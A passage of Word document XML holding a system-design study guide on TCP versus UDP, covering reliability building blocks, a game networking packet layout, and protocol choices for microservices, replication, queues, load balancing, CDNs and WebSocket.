    </w:p>
    <w:p w14:paraId="277D3318" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1395"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Need sub-millisecond latency where TCP's overhead is measurable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091DF31E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 Common Building Blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D047FBE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sequence numbers (ordering + loss detection):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A57E8F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F4E1F5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Each packet carries a sequence number.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488D3BB6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Receiver tracks: "I've received 1, 2, 3, 5, 6"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D38886F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>→ Knows 4 is missing (can request retransmit or skip).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD709EE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Acknowledgments (delivery confirmation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A4AFD3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FA0C9D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Receiver sends: "ACK 1, 2, 3, 5, 6" (selective acknowledgment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC2D082" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Sender knows: 4 was lost → retransmit 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC5CD2A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retransmission with timeout or NACK:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5C9819" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4144011A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Sender timeout: If no ACK for packet 4 within 2×RTT → retransmit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EB0C66" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>OR Receiver NACK: "I'm missing 4" → sender retransmits immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C47899C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>NACK-based is faster (receiver detects gap immediately, doesn't wait for sender timeout).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F76F65E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FEC (Forward Error Correction):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D6660B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69156B11" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Send 10 data packets + 2 FEC (parity) packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B9586B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>If any 2 are lost, the remaining 10 can reconstruct the original 10 data packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6281FAA1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>No retransmission needed → zero additional latency for recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F78D2C6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Trade: 20% bandwidth overhead for loss-free delivery without retransmission delay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493AB911" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.3 Example: Game Networking Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDA916C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1809CAAE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Packet structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB14529" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>┌─────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB70878" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│ Sequence Number (16 bit)                         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CC9D83" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│ ACK (last received seq from other side)          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C39416" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│ ACK Bitfield (32 bits — previous 32 packets)     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2715069B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│ Message count                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAB3063" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│ Messages:                                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6C3C20" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│   [type=UNRELIABLE, channel=position, data=...]  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194B82B3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│   [type=RELIABLE, channel=chat, seq=5, data=...] │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E1D63D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│   [type=UNRELIABLE, channel=input, data=...]     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E48107" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>└─────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4336E374" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1396"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unreliable channel (positions):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Send every frame. If lost, next frame supersedes. No retransmit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC0AC8A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1396"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reliable channel (chat):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Track per-channel sequence. Retransmit if not ACKed within 100ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A7E3FB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1396"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ordered reliable (events):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Like reliable, but receiver buffers until all prior messages in the channel are delivered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E1D05A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>Each channel can have different reliability semantics — impossible with TCP (all-or-nothing reliability).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A02E110" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="06FAB303">
          <v:rect id="_x0000_i5021" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8110E3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. TCP vs UDP in Specific System Design Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7171816B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 Microservice Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7EE57A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Almost always TCP (gRPC, HTTP/REST, Thrift):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613639AF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1397"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Correctness is paramount (financial calculations, user data, orders).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784FC989" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1397"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Connection pooling amortizes handshake cost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F37A3E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1397"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Service mesh handles connection management transparently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A55E89" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rare UDP uses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D288895" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1398"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Service discovery heartbeats (gossip protocol — Consul, Serf).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770C9BA9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1398"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Metrics collection (StatsD over UDP — non-blocking fire-and-forget).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BC92F0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1398"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Custom low-latency protocols in specialized systems (HFT).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125DD470" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.2 Database Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AB7899" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP (always):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313E49FE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1399"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>WAL replication MUST be reliable and ordered. A missing or reordered WAL entry = data corruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA968E5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1399"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>MySQL binlog replication: TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2729E7F1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1399"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>PostgreSQL streaming replication: TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB3DEB9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1399"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>MongoDB oplog replication: TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48740E56" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1399"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Cassandra inter-node: TCP (gossip for membership is also TCP in Cassandra).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2756DCC0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.3 Message Queues / Event Streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5F6D9E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kafka:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> TCP. Messages must be reliably delivered and ordered within partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FD2542" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NATS:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> TCP for core protocol. NATS is designed for low-latency but still needs reliability for "at-least-once" semantics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8B2D2C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ZeroMQ:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Can use TCP or IPC or inproc or PGM (reliable multicast over UDP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69509C71" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.4 Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548E8260" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>L4 (TCP/UDP-level):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2C8938" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1400"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>AWS NLB: handles both TCP and UDP connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19991C36" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1400"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>TCP: tracks connection state (forwards all packets of a connection to the same backend).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DC08A1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1400"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>UDP: stateless (can hash src IP+port to select backend, but no connection concept).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1143C722" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>L7 (HTTP-level):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703B1121" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1401"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Always TCP (because HTTP is TCP-based... until HTTP/3/QUIC which is UDP-based).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250D1E85" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.5 CDN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03588DCA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client → Edge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77443E12" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1402"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Traditionally: TCP (HTTP/1.1, HTTP/2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100E2184" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1402"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Increasingly: UDP (HTTP/3 over QUIC) — faster connection setup, better on lossy mobile networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09288ADD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Edge → Origin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736405D1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1403"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Typically: TCP (persistent connections with optimized settings).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F401258" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.6 WebSocket vs. WebRTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380C97B4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WebSocket (TCP-based):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5624B725" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1404"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Bidirectional, full-duplex communication over TCP.</w:t>
      </w:r>
    </w:p>
